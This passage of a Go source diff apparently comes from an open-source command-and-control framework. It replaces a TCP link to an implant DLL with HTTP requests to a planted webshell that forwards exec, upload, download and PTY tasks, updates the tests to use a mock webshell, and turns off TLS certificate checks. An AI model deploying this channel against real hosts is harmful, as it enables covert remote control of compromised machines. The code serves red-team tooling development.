defer ch.Close() if _, err := ch.Handshake(); err != nil { @@ -399,109 +238,30 @@ func TestForwardToSessionUnary(t *testing.T) { } runtime.sessions.Store(session.ID, session) - bridge := &Bridge{ - cfg: &Config{ListenerName: "test-listener"}, - } + bridge := &Bridge{cfg: &Config{ListenerName: "test-listener"}} - // Forward with unary task (Total = 1, not streaming) req := &clientpb.SpiteRequest{ Session: &clientpb.Session{SessionId: session.ID}, - Task: &clientpb.Task{TaskId: 1, Total: 1}, - Spite: &implantpb.Spite{Name: "exec"}, - } - - bridge.forwardToSession(runtime, session.ID, 1, req) - - sent := stream.Sent() - if len(sent) != 1 { - t.Fatalf("expected 1 response, got %d", len(sent)) - } - if sent[0].GetSpite().GetName() != "resp:exec" { - t.Errorf("expected 'resp:exec', got %q", sent[0].GetSpite().GetName()) - } -} - -func TestHandleSyncSession(t *testing.T) { - mock := newMockMaleficDLL(t) - defer mock.close() - - go mock.serve(t, 0) // Handshake only - - ch := dialMockDLL(t, mock.addr()) - defer ch.Close() - - if _, err := ch.Handshake(); err != nil { - t.Fatalf("handshake: %v", err) - } - - session := &Session{ - ID: "test-session", - PipelineID: "test-pipeline", - ListenerID: "test-listener", - channel: ch, - } - - runtime := &pipelineRuntime{ - name: "test-pipeline", - secureConfig: &implanttypes.SecureConfig{ - Enable: true, - ServerPrivateKey: "AGE-SECRET-KEY-PIPELINE", - ImplantPublicKey: "age1pipeline", - }, - done: make(chan struct{}), - } - runtime.sessions.Store(session.ID, session) - runtime.sessionsByRawID.Store(ch.sessionID, session) - - bridge := &Bridge{ - cfg: &Config{ListenerName: "test-listener"}, + Task: &clientpb.Task{TaskId: 500, Total: -1}, + Spite: &implantpb.Spite{Name: "start-pty"}, } - bridge.activeMu.Lock() - bridge.active = runtime - bridge.activeMu.Unlock() - - // Simulate CtrlListenerSyncSession from server - bridge.handleSyncSession(&clientpb.Session{ - RawId: ch.sessionID, - KeyPair: &clientpb.KeyPair{ - PublicKey: 
"age1session-specific", - PrivateKey: "AGE-SECRET-KEY-SESSION", - }, - }) - // Verify the channel's parser got updated with merged keys - if ch.parser == nil { - t.Fatal("parser should not be nil") - } - // The parser should now have keyPair set (we can verify via WithSecure's effect) - // Since MaleficParser.keyPair is unexported, we verify indirectly: - // the fact that handleSyncSession didn't panic and the channel is still alive - if !session.Alive() { - t.Error("session should still be alive after key sync") - } -} + bridge.forwardToSession(runtime, session.ID, 500, req) -func TestHandleSyncSessionUnknownRawID(t *testing.T) { - runtime := &pipelineRuntime{ - name: "test-pipeline", - done: make(chan struct{}), + // Wait for streaming responses + deadline := time.Now().Add(5 * time.Second) + for time.Now().Before(deadline) { + sent := stream.Sent() + if len(sent) >= 2 { + break + } + time.Sleep(100 * time.Millisecond) } - bridge := &Bridge{ - cfg: &Config{ListenerName: "test-listener"}, + sent := stream.Sent() + if len(sent) < 2 { + t.Fatalf("expected at least 2 streaming responses, got %d", len(sent)) } - bridge.activeMu.Lock() - bridge.active = runtime - bridge.activeMu.Unlock() - - // Should not panic with unknown raw ID - bridge.handleSyncSession(&clientpb.Session{ - RawId: 99999, - KeyPair: &clientpb.KeyPair{ - PublicKey: "age1unknown", - PrivateKey: "AGE-SECRET-KEY-UNKNOWN", - }, - }) } var _ listenerrpc.ListenerRPC_SpiteStreamClient = (*fakeSpiteStream)(nil) diff --git a/server/cmd/webshell-bridge/channel.go b/server/cmd/webshell-bridge/channel.go index 7a74bd34..8746a2a0 100644 --- a/server/cmd/webshell-bridge/channel.go +++ b/server/cmd/webshell-bridge/channel.go @@ -1,187 +1,215 @@ package main import ( + "bytes" "context" + "crypto/tls" "fmt" "io" - "net" + "net/http" "sync" + "sync/atomic" "time" "github.com/chainreactors/IoM-go/proto/client/clientpb" "github.com/chainreactors/IoM-go/proto/implant/implantpb" "github.com/chainreactors/logs" - malefic 
"github.com/chainreactors/malice-network/server/internal/parser/malefic" + "google.golang.org/protobuf/proto" ) const ( - handshakeBridgeID uint32 = 0 - connectTimeout = 10 * time.Second - streamChanBuffer = 16 + httpTimeout = 30 * time.Second + pollInterval = 500 * time.Millisecond + streamChanBuffer = 16 + stageInit = "init" + stageSpite = "spite" + stageStatus = "status" + headerStage = "X-Stage" + headerToken = "X-Token" + headerSessionID = "X-Session-ID" ) -// Channel manages the malefic protocol connection to the bind DLL on the target. -// The bridge binary acts as a client, the DLL acts as a malefic bind server. -// Communication tunnels through suo5: transport.Dial -> suo5 HTTP -> target localhost. +// ChannelIface abstracts the communication channel to the bridge DLL. +type ChannelIface interface { + Connect(ctx context.Context) error + Handshake() (*implantpb.Register, error) + StartRecvLoop() + Forward(taskID uint32, spite *implantpb.Spite) (*implantpb.Spite, error) + OpenStream(taskID uint32) <-chan *implantpb.Spite + SendSpite(taskID uint32, spite *implantpb.Spite) error + CloseStream(taskID uint32) + CloseAllStreams() + WithSecure(keyPair *clientpb.KeyPair) + Close() error + SessionID() uint32 + IsClosed() bool +} + +// Channel communicates with the bridge DLL through HTTP POST requests +// to the webshell's X-Stage endpoints. The webshell calls DLL exports +// (bridge_init, bridge_process) directly via function pointers — no TCP +// port opened on the target, pure memory channel. +// +// Wire format: raw protobuf over HTTP body. // -// Streaming task support: OpenStream registers a per-taskID response channel -// that persists across multiple DLL responses. recvLoop dispatches incoming -// packets to the correct channel without removing it, enabling PTY, bridge-agent, -// and other streaming modules. CloseStream or CloseAllStreams handles cleanup. 
+// For streaming tasks, a background poll goroutine periodically sends +// empty requests to collect pending responses from the DLL. type Channel struct { - conn net.Conn - transport dialTransport - dllAddr string - - sessionID uint32 // malefic session ID from DLL's first frame - parser *malefic.MaleficParser - - writeMu sync.Mutex // serializes writes to conn - pending map[uint32]chan *implantpb.Spite // taskID -> response channel - pendMu sync.Mutex // guards pending map - closed bool - closeMu sync.Mutex - recvDone chan struct{} // closed when recvLoop exits - recvErr error // terminal error from recvLoop -} + webshellURL string + token string + client *http.Client + + sid uint32 + sidSet atomic.Bool + closed atomic.Bool + closeCh chan struct{} -type dialTransport interface { - DialContext(ctx context.Context, network, address string) (net.Conn, error) + pendMu sync.Mutex + pending map[uint32]chan *implantpb.Spite + + pollCancel context.CancelFunc } -// NewChannel creates a channel that will connect through the given transport -// to the DLL's malefic bind server at dllAddr (e.g. "127.0.0.1:13338"). -func NewChannel(transport dialTransport, dllAddr, pipelineName string) *Channel { +// NewChannel creates a channel that communicates with the DLL through +// the webshell's X-Stage: spite HTTP endpoint. +func NewChannel(webshellURL, token string) *Channel { return &Channel{ - transport: transport, - dllAddr: dllAddr, - pending: make(map[uint32]chan *implantpb.Spite), - recvDone: make(chan struct{}), - parser: malefic.NewMaleficParser(), + webshellURL: webshellURL, + token: token, + client: &http.Client{ + Timeout: httpTimeout, + Transport: &http.Transport{ + TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, + }, + }, + pending: make(map[uint32]chan *implantpb.Spite), + closeCh: make(chan struct{}), } } -// Connect dials the DLL through suo5. No handshake is performed here; -// malefic bind sends the Register frame immediately after TCP connect. 
+// Connect verifies the webshell is reachable and the DLL is loaded. func (c *Channel) Connect(ctx context.Context) error { - dialCtx, cancel := context.WithTimeout(ctx, connectTimeout) - defer cancel() - - conn, err := c.transport.DialContext(dialCtx, "tcp", c.dllAddr) + body, err := c.doRequest(ctx, stageStatus, nil) if err != nil { - if dialCtx.Err() != nil { - return fmt.Errorf("connect timeout: %w", dialCtx.Err()) - } - return fmt.Errorf("dial DLL at %s: %w", c.dllAddr, err) + return fmt.Errorf("connect: %w", err) + } + status := string(body) + if status != "LOADED" { + return fmt.Errorf("DLL not loaded (status: %s)", status) } - c.conn = conn return nil } -// Handshake reads the initial registration data from the DLL. -// The malefic bind DLL sends a frame containing Spites{[Spite{Body: Register{...}}]} -// immediately after TCP connect. +// Handshake calls bridge_init on the DLL via the webshell and returns +// the Register message containing SysInfo and module list. func (c *Channel) Handshake() (*implantpb.Register, error) { - sid, length, err := c.parser.ReadHeader(c.conn) + body, err := c.doRequest(context.Background(), stageInit, nil) if err != nil { - return nil, fmt.Errorf("read handshake header: %w", err) - } - - buf := make([]byte, length) - if _, err := io.ReadFull(c.conn, buf); err != nil { - return nil, fmt.Errorf("read handshake payload: %w", err) + return nil, fmt.Errorf("handshake: %w", err) } - - spites, err := c.parser.Parse(buf) - if err != nil { - return nil, fmt.Errorf("parse handshake: %w", err) + if len(body) == 0 { + return nil, fmt.Errorf("empty handshake response") } - if len(spites.GetSpites()) == 0 { - return nil, fmt.Errorf("empty handshake frame") + // First 4 bytes: session ID (little-endian uint32), rest: Register protobuf + if len(body) < 4 { + return nil, fmt.Errorf("handshake response too short: %d bytes", len(body)) } + c.sid = uint32(body[0]) | uint32(body[1])<<8 | uint32(body[2])<<16 | uint32(body[3])<<24 + 
c.sidSet.Store(true) - spite := spites.GetSpites()[0] - reg := spite.GetRegister() - if reg == nil { - return nil, fmt.Errorf("handshake spite has no Register body") + reg := &implantpb.Register{} + if err := proto.Unmarshal(body[4:], reg); err != nil { + return nil, fmt.Errorf("unmarshal register: %w", err) } - c.sessionID = sid - logs.Log.Debugf("handshake received: sid=%d name=%s modules=%v", sid, reg.Name, reg.Module) + logs.Log.Debugf("handshake: sid=%d name=%s modules=%v", c.sid, reg.Name, reg.Module) return reg, nil } -// StartRecvLoop starts a background goroutine that reads responses from the -// DLL and dispatches them to the appropriate pending channel by taskID. -// Unlike the old single-response model, channels are NOT removed on first -// dispatch — they persist until explicitly closed via CloseStream. -// Must be called after Connect + Handshake. +// StartRecvLoop starts a background polling goroutine that fetches pending +// responses from the DLL for streaming tasks. func (c *Channel) StartRecvLoop() { - go c.recvLoop() + ctx, cancel := context.WithCancel(context.Background()) + c.pollCancel = cancel + go c.pollLoop(ctx) } -func (c *Channel) recvLoop() { - defer close(c.recvDone) +func (c *Channel) pollLoop(ctx context.Context) { + ticker := time.NewTicker(pollInterval) + defer ticker.Stop() + for { - _, length, err := c.parser.ReadHeader(c.conn) - if err != nil { - c.handleRecvLoopExit(err) + select { + case <-ctx.Done(): return - } - - buf := make([]byte, length) - if _, err := io.ReadFull(c.conn, buf); err != nil { - c.handleRecvLoopExit(fmt.Errorf("read payload: %w", err)) + case <-c.closeCh: return - } - - spites, err := c.parser.Parse(buf) - if err != nil { - logs.Log.Debugf("recv loop parse error (skipping frame): %v", err) - continue - } - - // Dispatch each Spite by its TaskId — do NOT delete the channel entry. 
- for _, spite := range spites.GetSpites() { - taskID := spite.GetTaskId() + case <-ticker.C: c.pendMu.Lock() - ch, ok := c.pending[taskID] + hasPending := len(c.pending) > 0 c.pendMu.Unlock() + if !hasPending { + continue + } - if ok { - select { - case ch <- spite: - default: - logs.Log.Debugf("recv loop: channel full for task %d, dropping", taskID) + empty := &implantpb.Spites{} + data, err := proto.Marshal(empty) + if err != nil { + continue + } + respBody, err := c.doRequest(ctx, stageSpite, data) + if err != nil { + if ctx.Err() != nil { + return } - } else { - logs.Log.Debugf("recv loop: no waiter for task %d", taskID) + logs.Log.Debugf("poll error: %v", err) + continue } + c.dispatchResponse(respBody) } } } -func (c *Channel) handleRecvLoopExit(err error) { - c.closeMu.Lock() - closed := c.closed - c.closeMu.Unlock() - if !closed { - logs.Log.Debugf("recv loop error: %v", err) +// Forward sends a Spite and waits for a single response (unary request-response). +func (c *Channel) Forward(taskID uint32, spite *implantpb.Spite) (*implantpb.Spite, error) { + if c.closed.Load() { + return nil, fmt.Errorf("channel closed") } - // Close all pending channels to signal EOF to waiters. 
- c.pendMu.Lock() - c.recvErr = err - for id, ch := range c.pending { - close(ch) - delete(c.pending, id) + + spite.TaskId = taskID + spites := &implantpb.Spites{Spites: []*implantpb.Spite{spite}} + data, err := proto.Marshal(spites) + if err != nil { + return nil, fmt.Errorf("marshal spite: %w", err) } - c.pendMu.Unlock() + + respBody, err := c.doRequest(context.Background(), stageSpite, data) + if err != nil { + return nil, fmt.Errorf("forward: %w", err) + } + + respSpites := &implantpb.Spites{} + if err := proto.Unmarshal(respBody, respSpites); err != nil { + return nil, fmt.Errorf("unmarshal response: %w", err) + } + + for _, s := range respSpites.GetSpites() { + if s.GetTaskId() == taskID { + return s, nil + } + } + + if len(respSpites.GetSpites()) > 0 { + for _, s := range respSpites.GetSpites() { + c.dispatchSpite(s) + } + } + + return nil, fmt.Errorf("no response for task %d", taskID) } -// OpenStream registers a buffered response channel for taskID and returns the read end. -// The channel receives all DLL responses for this taskID until CloseStream is called -// or the recvLoop exits (which closes the channel). +// OpenStream registers a persistent response channel for streaming tasks. func (c *Channel) OpenStream(taskID uint32) <-chan *implantpb.Spite { ch := make(chan *implantpb.Spite, streamChanBuffer) c.pendMu.Lock() @@ -190,41 +218,34 @@ func (c *Channel) OpenStream(taskID uint32) <-chan *implantpb.Spite { return ch } -// SendSpite sends a single spite to the DLL for the given taskID. -// Thread-safe: multiple goroutines can call SendSpite concurrently. +// SendSpite sends a spite to the DLL via the webshell. 
func (c *Channel) SendSpite(taskID uint32, spite *implantpb.Spite) error { - c.closeMu.Lock() - if c.closed || c.conn == nil { - c.closeMu.Unlock() + if c.closed.Load() { return fmt.Errorf("channel closed") } - c.closeMu.Unlock() spite.TaskId = taskID spites := &implantpb.Spites{Spites: []*implantpb.Spite{spite}} + data, err := proto.Marshal(spites) + if err != nil { + return fmt.Errorf("marshal: %w", err) + } - data, err := c.parser.Marshal(spites, c.sessionID) + respBody, err := c.doRequest(context.Background(), stageSpite, data) if err != nil { - return fmt.Errorf("marshal spite: %w", err) + return err } - c.writeMu.Lock() - _, err = c.conn.Write(data) - c.writeMu.Unlock() - return err + c.dispatchResponse(respBody) + return nil } -// CloseStream removes the pending channel for taskID. -// Does NOT close the channel itself to avoid send-on-closed-channel panic -// if recvLoop is concurrently dispatching. func (c *Channel) CloseStream(taskID uint32) { c.pendMu.Lock() delete(c.pending, taskID) c.pendMu.Unlock() } -// CloseAllStreams closes and removes all pending channels. -// Safe to call during teardown (holds pendMu for the entire operation). func (c *Channel) CloseAllStreams() { c.pendMu.Lock() for id, ch := range c.pending { @@ -234,40 +255,82 @@ func (c *Channel) CloseAllStreams() { c.pendMu.Unlock() } -// Forward sends a Spite request to the DLL and waits for a single response. -// Convenience wrapper over OpenStream + SendSpite + CloseStream for unary tasks. -func (c *Channel) Forward(taskID uint32, spite *implantpb.Spite) (*implantpb.Spite, error) { - ch := c.OpenStream(taskID) +func (c *Channel) SessionID() uint32 { return c.sid } + +func (c *Channel) IsClosed() bool { return c.closed.Load() } + +// WithSecure is a no-op. Use HTTPS for transport security. 
+func (c *Channel) WithSecure(_ *clientpb.KeyPair) {} + +func (c *Channel) Close() error { + if c.closed.Swap(true) { + return nil + } + close(c.closeCh) + if c.pollCancel != nil { + c.pollCancel() + } + c.CloseAllStreams() + return nil +} + +func (c *Channel) doRequest(ctx context.Context, stage string, body []byte) ([]byte, error) { + var bodyReader io.Reader + if body != nil { + bodyReader = bytes.NewReader(body) + } - if err := c.SendSpite(taskID, spite); err != nil { - c.CloseStream(taskID) + req, err := http.NewRequestWithContext(ctx, "POST", c.webshellURL, bodyReader) + if err != nil { + return nil, err + } + req.Header.Set(headerStage, stage) + if c.token != "" { + req.Header.Set(headerToken, c.token) + } + if c.sidSet.Load() { + req.Header.Set(headerSessionID, fmt.Sprintf("%d", c.sid)) + } + req.Header.Set("Content-Type", "application/octet-stream") + + resp, err := c.client.Do(req) + if err != nil { return nil, err } + defer resp.Body.Close() - resp, ok := <-ch - c.CloseStream(taskID) - if !ok { - return nil, fmt.Errorf("channel closed during forward") + if resp.StatusCode != http.StatusOK { + respBody, _ := io.ReadAll(resp.Body) + return nil, fmt.Errorf("HTTP %d: %s", resp.StatusCode, string(respBody)) } - return resp, nil -} -// WithSecure enables Age encryption/decryption on the malefic wire protocol. -func (c *Channel) WithSecure(keyPair *clientpb.KeyPair) { - c.parser.WithSecure(keyPair) + return io.ReadAll(resp.Body) } -// Close shuts down the malefic connection. 
-func (c *Channel) Close() error { - c.closeMu.Lock() - defer c.closeMu.Unlock() - - if c.closed { - return nil +func (c *Channel) dispatchResponse(body []byte) { + if len(body) == 0 { + return } - c.closed = true - if c.conn != nil { - return c.conn.Close() + spites := &implantpb.Spites{} + if err := proto.Unmarshal(body, spites); err != nil { + logs.Log.Debugf("dispatch unmarshal error: %v", err) + return + } + for _, spite := range spites.GetSpites() { + c.dispatchSpite(spite) + } +} + +func (c *Channel) dispatchSpite(spite *implantpb.Spite) { + taskID := spite.GetTaskId() + c.pendMu.Lock() + ch, ok := c.pending[taskID] + c.pendMu.Unlock() + if ok { + select { + case ch <- spite: + default: + logs.Log.Debugf("channel: pending full for task %d", taskID) + } } - return nil } diff --git a/server/cmd/webshell-bridge/channel_test.go b/server/cmd/webshell-bridge/channel_test.go index 46635264..1563b84a 100644 --- a/server/cmd/webshell-bridge/channel_test.go +++ b/server/cmd/webshell-bridge/channel_test.go @@ -1,91 +1,29 @@ package main import ( - "bytes" "encoding/binary" "io" - "net" + "net/http" + "net/http/httptest" "sync" "testing" "time" - "github.com/chainreactors/IoM-go/consts" "github.com/chainreactors/IoM-go/proto/implant/implantpb" - "github.com/chainreactors/malice-network/helper/utils/compress" - malefic "github.com/chainreactors/malice-network/server/internal/parser/malefic" - "github.com/gookit/config/v2" "google.golang.org/protobuf/proto" ) -func init() { - // Initialize config for the malefic parser's packet length check. - config.Set(consts.ConfigMaxPacketLength, 10*1024*1024) -} - -// testWriteMaleficFrame writes a malefic-framed message to conn for test use. 
-func testWriteMaleficFrame(conn net.Conn, spites *implantpb.Spites, sid uint32) error { - data, err := proto.Marshal(spites) - if err != nil { - return err - } - data, err = compress.Compress(data) - if err != nil { - return err - } - var buf bytes.Buffer - buf.WriteByte(malefic.DefaultStartDelimiter) - binary.Write(&buf, binary.LittleEndian, sid) - binary.Write(&buf, binary.LittleEndian, int32(len(data))) - buf.Write(data) - buf.WriteByte(malefic.DefaultEndDelimiter) - _, err = conn.Write(buf.Bytes()) - return err -} - -// testReadMaleficFrame reads a malefic-framed message from conn for test use. -func testReadMaleficFrame(conn net.Conn) (uint32, *implantpb.Spites, error) { - header := make([]byte, malefic.HeaderLength) - if _, err := io.ReadFull(conn, header); err != nil { - return 0, nil, err - } - if header[0] != malefic.DefaultStartDelimiter { - return 0, nil, io.ErrUnexpectedEOF - } - sid := binary.LittleEndian.Uint32(header[1:5]) - length := binary.LittleEndian.Uint32(header[5:9]) - buf := make([]byte, length+1) - if _, err := io.ReadFull(conn, buf); err != nil { - return 0, nil, err - } - payload := buf[:length] - decompressed, err := compress.Decompress(payload) - if err != nil { - decompressed = payload - } - spites := &implantpb.Spites{} - if err := proto.Unmarshal(decompressed, spites); err != nil { - return 0, nil, err - } - return sid, spites, nil -} - -// mockMaleficDLL simulates a malefic bind DLL. -// It accepts one connection, sends a Register handshake frame, -// then echoes Spite requests back with a modified Name field. -type mockMaleficDLL struct { - ln net.Listener +// mockWebshell simulates the webshell's X-Stage endpoints for testing. 
+type mockWebshell struct { register *implantpb.Register sessionID uint32 + + mu sync.Mutex + handler func(stage string, body []byte) ([]byte, int) // custom handler } -func newMockMaleficDLL(t *testing.T) *mockMaleficDLL { - t.Helper() - ln, err := net.Listen("tcp", "127.0.0.1:0") - if err != nil { - t.Fatalf("mock DLL listen: %v", err) - } - return &mockMaleficDLL{ - ln: ln, +func newMockWebshell() *mockWebshell { + return &mockWebshell{ sessionID: 42, register: &implantpb.Register{ Name: "test-dll", @@ -99,110 +37,99 @@ func newMockMaleficDLL(t *testing.T) *mockMaleficDLL { } } -func (m *mockMaleficDLL) addr() string { - return m.ln.Addr().String() -} - -func (m *mockMaleficDLL) close() { - m.ln.Close() -} +func (m *mockWebshell) ServeHTTP(w http.ResponseWriter, r *http.Request) { + stage := r.Header.Get("X-Stage") + body, _ := io.ReadAll(r.Body) -// serve handles one client connection through the full malefic protocol. -func (m *mockMaleficDLL) serve(t *testing.T, handleN int) { - t.Helper() - conn, err := m.ln.Accept() - if err != nil { - t.Errorf("mock DLL accept: %v", err) - return - } - defer conn.Close() + m.mu.Lock() + handler := m.handler + m.mu.Unlock() - // Send Register handshake as malefic frame - regSpite := &implantpb.Spites{ - Spites: []*implantpb.Spite{ - { - Body: &implantpb.Spite_Register{Register: m.register}, - }, - }, - } - if err := testWriteMaleficFrame(conn, regSpite, m.sessionID); err != nil { - t.Errorf("mock DLL send handshake: %v", err) + if handler != nil { + respBody, status := handler(stage, body) + if status != 0 { + w.WriteHeader(status) + } + if respBody != nil { + w.Write(respBody) + } return } - // Echo Spite requests back with modified Name - for i := 0; i < handleN; i++ { - sid, spites, err := testReadMaleficFrame(conn) - if err != nil { - t.Errorf("mock DLL read spite: %v", err) - return + switch stage { + case "status": + w.Write([]byte("LOADED")) + case "init": + regData, _ := proto.Marshal(m.register) + sid := 
make([]byte, 4) + binary.LittleEndian.PutUint32(sid, m.sessionID) + w.Write(sid) + w.Write(regData) + case "spite": + // Echo: parse input Spites, modify Name, return + inSpites := &implantpb.Spites{} + if len(body) > 0 { + proto.Unmarshal(body, inSpites) } - - respSpites := &implantpb.Spites{} - for _, spite := range spites.GetSpites() { - respSpites.Spites = append(respSpites.Spites, &implantpb.Spite{ - Name: "resp:" + spite.Name, - TaskId: spite.TaskId, + outSpites := &implantpb.Spites{} + for _, s := range inSpites.GetSpites() { + outSpites.Spites = append(outSpites.Spites, &implantpb.Spite{ + Name: "resp:" + s.Name, + TaskId: s.TaskId, }) } - if err := testWriteMaleficFrame(conn, respSpites, sid); err != nil { - t.Errorf("mock DLL send response: %v", err) - return - } + data, _ := proto.Marshal(outSpites) + w.Write(data) + default: + w.WriteHeader(404) } } -// dialMockDLL connects to the mock DLL and returns a Channel ready for Handshake/Forward. -func dialMockDLL(t *testing.T, addr string) *Channel { +func (m *mockWebshell) setHandler(h func(string, []byte) ([]byte, int)) { + m.mu.Lock() + m.handler = h + m.mu.Unlock() +} + +func startMockWebshell(t *testing.T) (*httptest.Server, *mockWebshell) { t.Helper() - conn, err := net.DialTimeout("tcp", addr, 5*time.Second) - if err != nil { - t.Fatalf("dial mock DLL: %v", err) - } - return &Channel{ - conn: conn, - dllAddr: addr, - pending: make(map[uint32]chan *implantpb.Spite), - recvDone: make(chan struct{}), - parser: malefic.NewMaleficParser(), - } + mock := newMockWebshell() + srv := httptest.NewServer(mock) + t.Cleanup(srv.Close) + return srv, mock } func TestChannelConnect(t *testing.T) { - mock := newMockMaleficDLL(t) - defer mock.close() + srv, _ := startMockWebshell(t) + ch := NewChannel(srv.URL, "") + defer ch.Close() - // Accept the connection in background - accepted := make(chan struct{}) - go func() { - conn, err := mock.ln.Accept() - if err != nil { - return + if err := ch.Connect(t.Context()); err 
!= nil { + t.Fatalf("connect: %v", err) + } +} + +func TestChannelConnectNotLoaded(t *testing.T) { + srv, mock := startMockWebshell(t) + mock.setHandler(func(stage string, body []byte) ([]byte, int) { + if stage == "status" { + return []byte("NOT_LOADED"), 200 } - conn.Close() - close(accepted) - }() + return nil, 404 + }) - conn, err := net.DialTimeout("tcp", mock.addr(), 5*time.Second) - if err != nil { - t.Fatalf("dial: %v", err) - } - conn.Close() + ch := NewChannel(srv.URL, "") + defer ch.Close() - select { - case <-accepted: - case <-time.After(time.Second): - t.Fatal("connection not accepted") + err := ch.Connect(t.Context()) + if err == nil { + t.Fatal("expected error for NOT_LOADED") } } func TestChannelHandshake(t *testing.T) { - mock := newMockMaleficDLL(t) - defer mock.close() - - go mock.serve(t, 0) // Handshake only - - ch := dialMockDLL(t, mock.addr()) + srv, _ := startMockWebshell(t) + ch := NewChannel(srv.URL, "") defer ch.Close() reg, err := ch.Handshake() @@ -219,323 +146,124 @@ func TestChannelHandshake(t *testing.T) { if reg.Sysinfo == nil || reg.Sysinfo.Os == nil || reg.Sysinfo.Os.Name != "Windows" { t.Errorf("expected Windows sysinfo, got %+v", reg.Sysinfo) } - if ch.sessionID != 42 { - t.Errorf("expected sessionID 42, got %d", ch.sessionID) + if ch.SessionID() != 42 { + t.Errorf("expected sessionID 42, got %d", ch.SessionID()) } } func TestChannelForward(t *testing.T) { - mock := newMockMaleficDLL(t) - defer mock.close() - - go mock.serve(t, 2) // Handshake + 2 Spite roundtrips - - ch := dialMockDLL(t, mock.addr()) + srv, _ := startMockWebshell(t) + ch := NewChannel(srv.URL, "") defer ch.Close() if _, err := ch.Handshake(); err != nil { t.Fatalf("handshake: %v", err) } - ch.StartRecvLoop() - - // Forward Spite #1 - resp1, err := ch.Forward(1, &implantpb.Spite{Name: "exec"}) - if err != nil { - t.Fatalf("forward #1: %v", err) - } - if resp1.Name != "resp:exec" { - t.Errorf("expected 'resp:exec', got %q", resp1.Name) - } - - // Forward Spite 
#2 - resp2, err := ch.Forward(2, &implantpb.Spite{Name: "upload"}) + resp, err := ch.Forward(1, &implantpb.Spite{Name: "exec"}) if err != nil { - t.Fatalf("forward #2: %v", err) + t.Fatalf("forward: %v", err) } - if resp2.Name != "resp:upload" { - t.Errorf("expected 'resp:upload', got %q", resp2.Name) + if resp.Name != "resp:exec" { + t.Errorf("expected 'resp:exec', got %q", resp.Name) } } -func TestChannelForwardBatch(t *testing.T) { - // Test that recvLoop correctly dispatches a batch response - // (one malefic frame containing multiple Spites). - mock := newMockMaleficDLL(t) - defer mock.close() - - go func() { - conn, err := mock.ln.Accept() - if err != nil { - return - } - defer conn.Close() - - // Send handshake - regSpite := &implantpb.Spites{ - Spites: []*implantpb.Spite{ - {Body: &implantpb.Spite_Register{Register: mock.register}}, - }, - } - testWriteMaleficFrame(conn, regSpite, mock.sessionID) - - // Read two individual requests - var requests []*implantpb.Spite - for i := 0; i < 2; i++ { - _, spites, err := testReadMaleficFrame(conn) - if err != nil { - return - } - requests = append(requests, spites.GetSpites()...) 
- } - - // Respond with a single batch frame containing both responses - batchResp := &implantpb.Spites{} - for _, req := range requests { - batchResp.Spites = append(batchResp.Spites, &implantpb.Spite{ - Name: "resp:" + req.Name, - TaskId: req.TaskId, - }) - } - testWriteMaleficFrame(conn, batchResp, mock.sessionID) - }() - - ch := dialMockDLL(t, mock.addr()) +func TestChannelForwardMultiple(t *testing.T) { + srv, _ := startMockWebshell(t) + ch := NewChannel(srv.URL, "") defer ch.Close() if _, err := ch.Handshake(); err != nil { t.Fatalf("handshake: %v", err) } - ch.StartRecvLoop() - - // Send two requests concurrently - var wg sync.WaitGroup - results := make(map[uint32]string) - var mu sync.Mutex - for _, tc := range []struct { - id uint32 - name string - }{ - {10, "exec"}, - {20, "download"}, - } { - wg.Add(1) - go func(id uint32, name string) { - defer wg.Done() - resp, err := ch.Forward(id, &implantpb.Spite{Name: name}) - if err != nil { - t.Errorf("forward %d: %v", id, err) - return - } - mu.Lock() - results[id] = resp.Name - mu.Unlock() - }(tc.id, tc.name) - } - - wg.Wait() - - if results[10] != "resp:exec" { - t.Errorf("task 10: expected 'resp:exec', got %q", results[10]) - } - if results[20] != "resp:download" { - t.Errorf("task 20: expected 'resp:download', got %q", results[20]) - } -} - -func TestChannelStreamMultipleResponses(t *testing.T) { - // Test that OpenStream receives multiple responses for the same taskID - // without the channel being removed after the first one. 
- mock := newMockMaleficDLL(t) - defer mock.close() - - const taskID uint32 = 100 - const numResponses = 3 - - go func() { - conn, err := mock.ln.Accept() + for i, name := range []string{"exec", "upload", "download"} { + resp, err := ch.Forward(uint32(i+1), &implantpb.Spite{Name: name}) if err != nil { - return - } - defer conn.Close() - - // Send handshake - regSpite := &implantpb.Spites{ - Spites: []*implantpb.Spite{ - {Body: &implantpb.Spite_Register{Register: mock.register}}, - }, + t.Fatalf("forward %d: %v", i, err) } - testWriteMaleficFrame(conn, regSpite, mock.sessionID) - - // Read the initial request - testReadMaleficFrame(conn) - - // Send multiple responses for the same taskID in separate frames - for i := 0; i < numResponses; i++ { - resp := &implantpb.Spites{ - Spites: []*implantpb.Spite{ - { - Name: "chunk:" + string(rune('A'+i)), - TaskId: taskID, - }, - }, - } - if err := testWriteMaleficFrame(conn, resp, mock.sessionID); err != nil { - return - } + expected := "resp:" + name + if resp.Name != expected { + t.Errorf("task %d: expected %q, got %q", i+1, expected, resp.Name) } - }() - - ch := dialMockDLL(t, mock.addr()) - defer ch.Close() - - if _, err := ch.Handshake(); err != nil { - t.Fatalf("handshake: %v", err) } +} - // Open a persistent stream for this task - respCh := ch.OpenStream(taskID) - ch.StartRecvLoop() - - // Send the initial request - if err := ch.SendSpite(taskID, &implantpb.Spite{Name: "start-stream"}); err != nil { - t.Fatalf("send spite: %v", err) +func TestChannelCloseIdempotent(t *testing.T) { + ch := NewChannel("http://localhost:1", "") + if err := ch.Close(); err != nil { + t.Fatalf("first close: %v", err) } - - // Collect all responses - var received []string - for i := 0; i < numResponses; i++ { - select { - case spite, ok := <-respCh: - if !ok { - t.Fatalf("channel closed after %d responses", i) - } - received = append(received, spite.Name) - case <-time.After(2 * time.Second): - t.Fatalf("timeout waiting for response %d", 
